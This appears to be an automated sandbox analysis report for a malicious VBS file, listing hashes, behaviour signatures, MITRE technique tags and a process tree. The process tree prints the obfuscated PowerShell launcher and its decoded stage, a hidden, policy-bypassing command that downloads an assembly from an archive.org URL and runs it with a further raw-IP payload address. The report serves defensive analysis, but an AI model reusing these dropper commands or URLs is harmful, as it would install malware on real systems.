234ec1709640c409c97d44db036f181f4956a15c73a8756f7a714a57a59ff66c

General

Target

0x000300000000b3e3-94.vbs
Size

194KB
MD5

914253e6225b686ee3e0a752c1cd1bb4
SHA1

42e9ae719f4dfd04e7dcb9d58a911eb37fd3439c
SHA256

00f52a2f56551d868397acd11e4d12c353d7107ce680c6ff00012a90dabc818b
SHA512

92ecf4249ef488d95a657a3e920316cc816e2e8d5d2b8e257e4ce074626beda95d379034c86758ac7a1623354cfe2cba14bf811f73f3a35fe97e3610d85c9e3b
SSDEEP

3072:7tduXlp2G4E2A0w8Vf0DyQPrWDgt5pUGw1piL71OkHiMZzvcqgp3yO9pj2t7tK:JW2Gp9b8tPQPacR9vctpiO9pjGtK

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt

exe.dropper

https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	2800	powershell.exe
6	2800	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2076	powershell.exe
2800	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2076	powershell.exe
2800	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2076	powershell.exe
Token: SeDebugPrivilege	2800	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2412 wrote to memory of 2076	2412	WScript.exe	30
PID 2412 wrote to memory of 2076	2412	WScript.exe	30
PID 2412 wrote to memory of 2076	2412	WScript.exe	30
PID 2076 wrote to memory of 2800	2076	powershell.exe	32
PID 2076 wrote to memory of 2800	2076	powershell.exe	32
PID 2076 wrote to memory of 2800	2076	powershell.exe	32

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0x000300000000b3e3-94.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2412
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J⛮ ䷖ ⧉ ┕ ⽚B1⛮ ䷖ ⧉ ┕ ⽚HI⛮ ䷖ ⧉ ┕ ⽚b⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚g⛮ ䷖ ⧉ ┕ ⽚D0⛮ ䷖ ⧉ ┕ ⽚I⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚n⛮ ䷖ ⧉ ┕ ⽚Gg⛮ ䷖ ⧉ ┕ ⽚d⛮ ䷖ ⧉ ┕ ⽚B0⛮ ䷖ ⧉ ┕ ⽚H⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚cw⛮ ䷖ ⧉ ┕ ⽚6⛮ ䷖ ⧉ ┕ ⽚C8⛮ ䷖ ⧉ ┕ ⽚LwBp⛮ ䷖ ⧉ ┕ ⽚GE⛮ ䷖ ⧉ ┕ ⽚Ng⛮ ䷖ ⧉ ┕ ⽚w⛮ ䷖ ⧉ ┕ ⽚D⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚MQ⛮ ䷖ ⧉ ┕ ⽚w⛮ ䷖ ⧉ ┕ ⽚D⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚LgB1⛮ ䷖ ⧉ ┕ ⽚HM⛮ ䷖ ⧉ ┕ ⽚LgBh⛮ ䷖ ⧉ ┕ ⽚HI⛮ ䷖ ⧉ ┕ ⽚YwBo⛮ ䷖ ⧉ ┕ ⽚Gk⛮ ䷖ ⧉ ┕ ⽚dgBl⛮ ䷖ ⧉ ┕ ⽚C4⛮ ䷖ ⧉ ┕ ⽚bwBy⛮ ䷖ ⧉ ┕ ⽚Gc⛮ ䷖ ⧉ ┕ ⽚Lw⛮ ䷖ ⧉ ┕ ⽚y⛮ ䷖ ⧉ ┕ ⽚DQ⛮ ䷖ ⧉ ┕ ⽚LwBp⛮ ䷖ ⧉ ┕ ⽚HQ⛮ ䷖ ⧉ ┕ ⽚ZQBt⛮ ䷖ ⧉ ┕ ⽚HM⛮ ䷖ ⧉ ┕ ⽚LwBk⛮ ䷖ ⧉ ┕ ⽚GU⛮ ䷖ ⧉ ┕ ⽚d⛮ ䷖ ⧉ ┕ ⽚Bh⛮ ䷖ ⧉ ┕ ⽚Gg⛮ ䷖ ⧉ ┕ ⽚LQBu⛮ ䷖ ⧉ ┕ ⽚G8⛮ ䷖ ⧉ ┕ ⽚d⛮ ䷖ ⧉ ┕ ⽚Bl⛮ ䷖ ⧉ ┕ ⽚C0⛮ ䷖ ⧉ ┕ ⽚dg⛮ ䷖ ⧉ ┕ ⽚v⛮ ䷖ ⧉ ┕ ⽚EQ⛮ ䷖ ⧉ ┕ ⽚ZQB0⛮ ䷖ ⧉ ┕ ⽚GE⛮ ䷖ ⧉ ┕ ⽚a⛮ ䷖ ⧉ ┕ ⽚BO⛮ ䷖ ⧉ ┕ ⽚G8⛮ ䷖ ⧉ ┕ ⽚d⛮ ䷖ ⧉ ┕ ⽚Bl⛮ ䷖ ⧉ ┕ ⽚FY⛮ ䷖ ⧉ ┕ ⽚LgB0⛮ ䷖ ⧉ ┕ ⽚Hg⛮ ䷖ ⧉ ┕ ⽚d⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚n⛮ ䷖ ⧉ ┕ ⽚Ds⛮ ䷖ ⧉ ┕ ⽚J⛮ ䷖ ⧉ ┕ ⽚Bi⛮ ䷖ ⧉ ┕ ⽚GE⛮ ䷖ ⧉ ┕ ⽚cwBl⛮ ䷖ ⧉ ┕ ⽚DY⛮ ䷖ ⧉ ┕ ⽚N⛮ ䷖ ⧉ ┕ ⽚BD⛮ ䷖ ⧉ ┕ ⽚G8⛮ ䷖ ⧉ ┕ ⽚bgB0⛮ ䷖ ⧉ ┕ ⽚GU⛮ ䷖ ⧉ ┕ ⽚bgB0⛮ ䷖ ⧉ ┕ ⽚C⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚PQ⛮ ䷖ ⧉ ┕ ⽚g⛮ ䷖ ⧉ ┕ ⽚Cg⛮ ䷖ ⧉ ┕ ⽚TgBl⛮ ䷖ ⧉ ┕ ⽚Hc⛮ ䷖ ⧉ ┕ ⽚LQBP⛮ ䷖ ⧉ ┕ ⽚GI⛮ ䷖ ⧉ ┕ ⽚agBl⛮ ䷖ ⧉ ┕ ⽚GM⛮ ䷖ ⧉ ┕ ⽚d⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚g⛮ ䷖ ⧉ ┕ ⽚FM⛮ ䷖ ⧉ ┕ ⽚eQBz⛮ ䷖ ⧉ ┕ ⽚HQ⛮ ䷖ ⧉ ┕ ⽚ZQBt⛮ ䷖ ⧉ ┕ ⽚C4⛮ ䷖ ⧉ ┕ ⽚TgBl⛮ ䷖ ⧉ ┕ ⽚HQ⛮ ䷖ ⧉ ┕ ⽚LgBX⛮ ䷖ ⧉ ┕ ⽚GU⛮ ䷖ ⧉ ┕ ⽚YgBD⛮ ䷖ ⧉ ┕ ⽚Gw⛮ ䷖ ⧉ ┕ ⽚aQBl⛮ ䷖ ⧉ ┕ ⽚G4⛮ ䷖ ⧉ ┕ ⽚d⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚p⛮ ䷖ ⧉ ┕ ⽚C4⛮ ䷖ ⧉ ┕ ⽚R⛮ ䷖ ⧉ ┕ ⽚Bv⛮ ䷖ ⧉ ┕ ⽚Hc⛮ ䷖ ⧉ ┕ ⽚bgBs⛮ ䷖ ⧉ ┕ ⽚G8⛮ ䷖ ⧉ ┕ ⽚YQBk⛮ ䷖ ⧉ ┕ ⽚FM⛮ ䷖ ⧉ ┕ ⽚d⛮ ䷖ ⧉ ┕ ⽚By⛮ ䷖ ⧉ ┕ ⽚Gk⛮ ䷖ ⧉ ┕ ⽚bgBn⛮ ䷖ ⧉ ┕ ⽚Cg⛮ ䷖ ⧉ ┕ ⽚J⛮ ䷖ ⧉ ┕ ⽚B1⛮ ䷖ ⧉ ┕ ⽚HI⛮ ䷖ ⧉ ┕ ⽚b⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚p⛮ ䷖ ⧉ ┕ ⽚Ds⛮ ䷖ ⧉ ┕ ⽚J⛮ ䷖ ⧉ ┕ ⽚Bi⛮ ䷖ ⧉ ┕ ⽚Gk⛮ ䷖ ⧉ ┕ ⽚bgBh⛮ ䷖ ⧉ ┕ ⽚HI⛮ ䷖ ⧉ ┕ ⽚eQBD⛮ ䷖ ⧉ ┕ ⽚G8⛮ ䷖ ⧉ ┕ ⽚bgB0⛮ ䷖ ⧉ ┕ ⽚GU⛮ ䷖ ⧉ ┕ ⽚bgB0⛮ ䷖ ⧉ ┕ ⽚C⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚PQ⛮ ䷖ ⧉ ┕ ⽚g⛮ ䷖ ⧉ ┕ ⽚Fs⛮ ䷖ ⧉ ┕ ⽚UwB5⛮ ䷖ ⧉ ┕ ⽚HM⛮ ䷖ ⧉ ┕ ⽚d⛮ ䷖ ⧉ ┕ ⽚Bl⛮ ䷖ ⧉ ┕ ⽚G0⛮ ䷖ ⧉ ┕ ⽚LgBD⛮ ䷖ ⧉ ┕ ⽚G8⛮ ䷖ ⧉ ┕ ⽚bgB2⛮ ䷖ ⧉ ┕ ⽚GU⛮ ䷖ ⧉ ┕ ⽚cgB0⛮ ䷖ ⧉ ┕ ⽚F0⛮ ䷖ ⧉ ┕ ⽚Og⛮ ䷖ ⧉ ┕ ⽚6⛮ ䷖ ⧉ ┕ ⽚EY⛮ ䷖ ⧉ ┕ ⽚cgBv⛮ ䷖ ⧉ ┕ ⽚G0⛮ ䷖ ⧉ ┕ ⽚QgBh⛮ ䷖ ⧉ ┕ ⽚HM⛮ ䷖ ⧉ ┕ ⽚ZQ⛮ ䷖ ⧉ ┕ ⽚2⛮ ䷖ ⧉ ┕ ⽚DQ⛮ ䷖ ⧉ ┕ ⽚UwB0⛮ ䷖ ⧉ ┕ ⽚HI⛮ ䷖ ⧉ ┕ ⽚aQBu⛮ ䷖ ⧉ ┕ ⽚Gc⛮ ䷖ ⧉ ┕ ⽚K⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚k⛮ ䷖ ⧉ ┕ ⽚GI⛮ ䷖ ⧉ ┕ ⽚YQBz⛮ ䷖ ⧉ ┕ ⽚GU⛮ ䷖ ⧉ ┕ ⽚Ng⛮ ䷖ ⧉ ┕ ⽚0⛮ ䷖ ⧉ ┕ ⽚EM⛮ ䷖ ⧉ ┕ ⽚bwBu⛮ ䷖ ⧉ ┕ ⽚HQ⛮ ䷖ ⧉ ┕ ⽚ZQBu⛮ ䷖ ⧉ ┕ ⽚HQ⛮ ䷖ ⧉ ┕ ⽚KQ⛮ ䷖ ⧉ ┕ ⽚7⛮ ䷖ ⧉ ┕ ⽚CQ⛮ ䷖ ⧉ ┕ ⽚YQBz⛮ ䷖ ⧉ ┕ ⽚HM⛮ ䷖ ⧉ ┕ ⽚ZQBt⛮ ䷖ ⧉ ┕ ⽚GI⛮ ䷖ ⧉ ┕ ⽚b⛮ ䷖ ⧉ ┕ ⽚B5⛮ ䷖ ⧉ ┕ ⽚C⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚PQ⛮ ䷖ ⧉ ┕ ⽚g⛮ ䷖ ⧉ ┕ ⽚Fs⛮ ䷖ ⧉ ┕ ⽚UgBl⛮ ䷖ ⧉ ┕ ⽚GY⛮ ䷖ ⧉ ┕ ⽚b⛮ ䷖ ⧉ ┕ ⽚Bl⛮ ䷖ ⧉ ┕ ⽚GM⛮ ䷖ ⧉ ┕ ⽚d⛮ ䷖ ⧉ ┕ ⽚Bp⛮ ䷖ ⧉ ┕ ⽚G8⛮ ䷖ ⧉ ┕ ⽚bg⛮ ䷖ ⧉ ┕ ⽚u⛮ ䷖ ⧉ ┕ ⽚EE⛮ ䷖ ⧉ ┕ ⽚cwBz⛮ ䷖ ⧉ ┕ ⽚GU⛮ ䷖ ⧉ ┕ ⽚bQBi⛮ ䷖ ⧉ ┕ ⽚Gw⛮ ䷖ ⧉ ┕ ⽚eQBd⛮ ䷖ ⧉ ┕ ⽚Do⛮ ䷖ ⧉ ┕ ⽚OgBM⛮ ䷖ ⧉ ┕ ⽚G8⛮ ䷖ ⧉ ┕ ⽚YQBk⛮ ䷖ ⧉ ┕ ⽚Cg⛮ ䷖ ⧉ ┕ ⽚J⛮ ䷖ ⧉ ┕ ⽚Bi⛮ ䷖ ⧉ ┕ ⽚Gk⛮ ䷖ ⧉ ┕ ⽚bgBh⛮ ䷖ ⧉ ┕ ⽚HI⛮ ䷖ ⧉ ┕ ⽚eQBD⛮ ䷖ ⧉ ┕ ⽚G8⛮ ䷖ ⧉ ┕ ⽚bgB0⛮ ䷖ ⧉ ┕ ⽚GU⛮ ䷖ ⧉ ┕ ⽚bgB0⛮ ䷖ ⧉ ┕ ⽚Ck⛮ ䷖ ⧉ ┕ ⽚Ow⛮ ䷖ ⧉ ┕ ⽚k⛮ ䷖ ⧉ ┕ ⽚HQ⛮ ䷖ ⧉ ┕ ⽚eQBw⛮ ䷖ ⧉ ┕ ⽚GU⛮ ䷖ ⧉ ┕ ⽚I⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚9⛮ ䷖ ⧉ ┕ ⽚C⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚J⛮ ䷖ ⧉ ┕ ⽚Bh⛮ ䷖ ⧉ ┕ ⽚HM⛮ ䷖ ⧉ ┕ ⽚cwBl⛮ ䷖ ⧉ ┕ ⽚G0⛮ ䷖ ⧉ ┕ ⽚YgBs⛮ ䷖ ⧉ ┕ ⽚Hk⛮ ䷖ ⧉ ┕ ⽚LgBH⛮ ䷖ ⧉ ┕ ⽚GU⛮ ䷖ ⧉ ┕ ⽚d⛮ ䷖ ⧉ ┕ ⽚BU⛮ ䷖ ⧉ ┕ ⽚Hk⛮ ䷖ ⧉ ┕ ⽚c⛮ ䷖ ⧉ ┕ ⽚Bl⛮ ䷖ ⧉ ┕ ⽚Cg⛮ ䷖ ⧉ ┕ ⽚JwBS⛮ ䷖ ⧉ ┕ ⽚HU⛮ ䷖ ⧉ ┕ ⽚bgBQ⛮ ䷖ ⧉ ┕ ⽚EU⛮ ䷖ ⧉ ┕ ⽚LgBI⛮ ䷖ ⧉ ┕ ⽚G8⛮ ䷖ ⧉ ┕ ⽚bQBl⛮ ䷖ ⧉ ┕ ⽚Cc⛮ ䷖ ⧉ ┕ ⽚KQ⛮ ䷖ ⧉ ┕ ⽚7⛮ ䷖ ⧉ ┕ ⽚CQ⛮ ䷖ ⧉ ┕ ⽚bQBl⛮ ䷖ ⧉ ┕ ⽚HQ⛮ ䷖ ⧉ ┕ ⽚a⛮ ䷖ ⧉ ┕ ⽚Bv⛮ ䷖ ⧉ ┕ ⽚GQ⛮ ䷖ ⧉ ┕ ⽚I⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚9⛮ ䷖ ⧉ ┕ ⽚C⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚J⛮ ䷖ ⧉ ┕ ⽚B0⛮ ䷖ ⧉ ┕ ⽚Hk⛮ ䷖ ⧉ ┕ ⽚c⛮ ䷖ ⧉ ┕ ⽚Bl⛮ ䷖ ⧉ ┕ ⽚C4⛮ ䷖ ⧉ ┕ ⽚RwBl⛮ ䷖ ⧉ ┕ ⽚HQ⛮ ䷖ ⧉ ┕ ⽚TQBl⛮ ䷖ ⧉ ┕ ⽚HQ⛮ ䷖ ⧉ ┕ ⽚a⛮ ䷖ ⧉ ┕ ⽚Bv⛮ ䷖ ⧉ ┕ ⽚GQ⛮ ䷖ ⧉ ┕ ⽚K⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚n⛮ ䷖ ⧉ ┕ ⽚FY⛮ ䷖ ⧉ ┕ ⽚QQBJ⛮ ䷖ ⧉ ┕ ⽚Cc⛮ ䷖ ⧉ ┕ ⽚KQ⛮ ䷖ ⧉ ┕ ⽚7⛮ ䷖ ⧉ ┕ ⽚CQ⛮ ䷖ ⧉ ┕ ⽚bQBl⛮ ䷖ ⧉ ┕ ⽚HQ⛮ ䷖ ⧉ ┕ ⽚a⛮ ䷖ ⧉ ┕ ⽚Bv⛮ ䷖ ⧉ ┕ ⽚GQ⛮ ䷖ ⧉ ┕ ⽚LgBJ⛮ ䷖ ⧉ ┕ ⽚G4⛮ ䷖ ⧉ ┕ ⽚dgBv⛮ ䷖ ⧉ ┕ ⽚Gs⛮ ䷖ ⧉ ┕ ⽚ZQ⛮ ䷖ ⧉ ┕ ⽚o⛮ ䷖ ⧉ ┕ ⽚CQ⛮ ䷖ ⧉ ┕ ⽚bgB1⛮ ䷖ ⧉ ┕ ⽚Gw⛮ ䷖ ⧉ ┕ ⽚b⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚s⛮ ䷖ ⧉ ┕ ⽚C⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚WwBv⛮ ䷖ ⧉ ┕ ⽚GI⛮ ䷖ ⧉ ┕ ⽚agBl⛮ ䷖ ⧉ ┕ ⽚GM⛮ ䷖ ⧉ ┕ ⽚d⛮ ䷖ ⧉ ┕ ⽚Bb⛮ ䷖ ⧉ ┕ ⽚F0⛮ ䷖ ⧉ ┕ ⽚XQB⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚Cg⛮ ䷖ ⧉ ┕ ⽚JwB0⛮ ䷖ ⧉ ┕ ⽚Hg⛮ ䷖ ⧉ ┕ ⽚d⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚u⛮ ䷖ ⧉ ┕ ⽚EM⛮ ䷖ ⧉ ┕ ⽚RgBD⛮ ䷖ ⧉ ┕ ⽚E4⛮ ䷖ ⧉ ┕ ⽚Ug⛮ ䷖ ⧉ ┕ ⽚v⛮ ䷖ ⧉ ┕ ⽚DM⛮ ䷖ ⧉ ┕ ⽚O⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚v⛮ ䷖ ⧉ ┕ ⽚DE⛮ ䷖ ⧉ ┕ ⽚Nw⛮ ䷖ ⧉ ┕ ⽚x⛮ ䷖ ⧉ ┕ ⽚C4⛮ ䷖ ⧉ ┕ ⽚MQ⛮ ䷖ ⧉ ┕ ⽚4⛮ ䷖ ⧉ ┕ ⽚C4⛮ ䷖ ⧉ ┕ ⽚Mg⛮ ䷖ ⧉ ┕ ⽚x⛮ ䷖ ⧉ ┕ ⽚C4⛮ ䷖ ⧉ ┕ ⽚O⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚5⛮ ䷖ ⧉ ┕ ⽚DE⛮ ䷖ ⧉ ┕ ⽚Lw⛮ ䷖ ⧉ ┕ ⽚v⛮ ䷖ ⧉ ┕ ⽚Do⛮ ䷖ ⧉ ┕ ⽚c⛮ ䷖ ⧉ ┕ ⽚B0⛮ ䷖ ⧉ ┕ ⽚HQ⛮ ䷖ ⧉ ┕ ⽚a⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚n⛮ ䷖ ⧉ ┕ ⽚C⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚L⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚g⛮ ䷖ ⧉ ┕ ⽚Cc⛮ ䷖ ⧉ ┕ ⽚Z⛮ ䷖ ⧉ ┕ ⽚Bl⛮ ䷖ ⧉ ┕ ⽚HM⛮ ䷖ ⧉ ┕ ⽚YQB0⛮ ䷖ ⧉ ┕ ⽚Gk⛮ ䷖ ⧉ ┕ ⽚dgBh⛮ ䷖ ⧉ ┕ ⽚GQ⛮ ䷖ ⧉ ┕ ⽚bw⛮ ䷖ ⧉ ┕ ⽚n⛮ ䷖ ⧉ ┕ ⽚C⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚L⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚g⛮ ䷖ ⧉ ┕ ⽚Cc⛮ ䷖ ⧉ ┕ ⽚Z⛮ ䷖ ⧉ ┕ ⽚Bl⛮ ䷖ ⧉ ┕ ⽚HM⛮ ䷖ ⧉ ┕ ⽚YQB0⛮ ䷖ ⧉ ┕ ⽚Gk⛮ ䷖ ⧉ ┕ ⽚dgBh⛮ ䷖ ⧉ ┕ ⽚GQ⛮ ䷖ ⧉ ┕ ⽚bw⛮ ䷖ ⧉ ┕ ⽚n⛮ ䷖ ⧉ ┕ ⽚C⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚L⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚g⛮ ䷖ ⧉ ┕ ⽚Cc⛮ ䷖ ⧉ ┕ ⽚Z⛮ ䷖ ⧉ ┕ ⽚Bl⛮ ䷖ ⧉ ┕ ⽚HM⛮ ䷖ ⧉ ┕ ⽚YQB0⛮ ䷖ ⧉ ┕ ⽚Gk⛮ ䷖ ⧉ ┕ ⽚dgBh⛮ ䷖ ⧉ ┕ ⽚GQ⛮ ䷖ ⧉ ┕ ⽚bw⛮ ䷖ ⧉ ┕ ⽚n⛮ ䷖ ⧉ ┕ ⽚Cw⛮ ䷖ ⧉ ┕ ⽚JwBS⛮ ䷖ ⧉ ┕ ⽚GU⛮ ䷖ ⧉ ┕ ⽚ZwBB⛮ ䷖ ⧉ ┕ ⽚HM⛮ ䷖ ⧉ ┕ ⽚bQ⛮ ䷖ ⧉ ┕ ⽚n⛮ ䷖ ⧉ ┕ ⽚Cw⛮ ䷖ ⧉ ┕ ⽚Jw⛮ ䷖ ⧉ ┕ ⽚n⛮ ䷖ ⧉ ┕ ⽚Ck⛮ ䷖ ⧉ ┕ ⽚KQ⛮ ䷖ ⧉ ┕ ⽚=';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('⛮ ䷖ ⧉ ┕ ⽚','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2076
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$url = 'https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt';$base64Content = (New-Object System.Net.WebClient).DownloadString($url);$binaryContent = [System.Convert]::FromBase64String($base64Content);$assembly = [Reflection.Assembly]::Load($binaryContent);$type = $assembly.GetType('RunPE.Home');$method = $type.GetMethod('VAI');$method.Invoke($null, [object[]]@('txt.CFCNR/38/171.18.21.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2800

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
204e791893102c899c1fa7a960b09295

SHA1
d45acf2f5ea9c172cffb5d6761eab527f2c65789

SHA256
19f2038d00868145272935086e86c56cc02c11ec1b0d30b752a399dc205378d5

SHA512
8ee53625dc7ef608a6d58c8471a62d050cb7859e82eafbf42ccba5a119da0e9c50e73741e8e0a61cddd5d386e2ef11d088c11c6ed0b7b738c1331d5a0e16e8ae

Download Submit
memory/2076-4-0x000007FEF558E000-0x000007FEF558F000-memory.dmp

Filesize
4KB

Download
memory/2076-5-0x000000001B740000-0x000000001BA22000-memory.dmp

Filesize
2.9MB

Download
memory/2076-6-0x0000000001C10000-0x0000000001C18000-memory.dmp

Filesize
32KB

Download
memory/2076-8-0x000007FEF52D0000-0x000007FEF5C6D000-memory.dmp

Filesize
9.6MB

Download
memory/2076-7-0x000007FEF52D0000-0x000007FEF5C6D000-memory.dmp

Filesize
9.6MB

Download
memory/2076-10-0x000007FEF52D0000-0x000007FEF5C6D000-memory.dmp

Filesize
9.6MB

Download
memory/2076-9-0x000007FEF52D0000-0x000007FEF5C6D000-memory.dmp

Filesize
9.6MB

Download
memory/2076-11-0x000007FEF52D0000-0x000007FEF5C6D000-memory.dmp

Filesize
9.6MB

Download
memory/2076-17-0x000007FEF558E000-0x000007FEF558F000-memory.dmp

Filesize
4KB

Download
memory/2076-18-0x000007FEF52D0000-0x000007FEF5C6D000-memory.dmp

Filesize
9.6MB

Download
memory/2076-19-0x000007FEF52D0000-0x000007FEF5C6D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing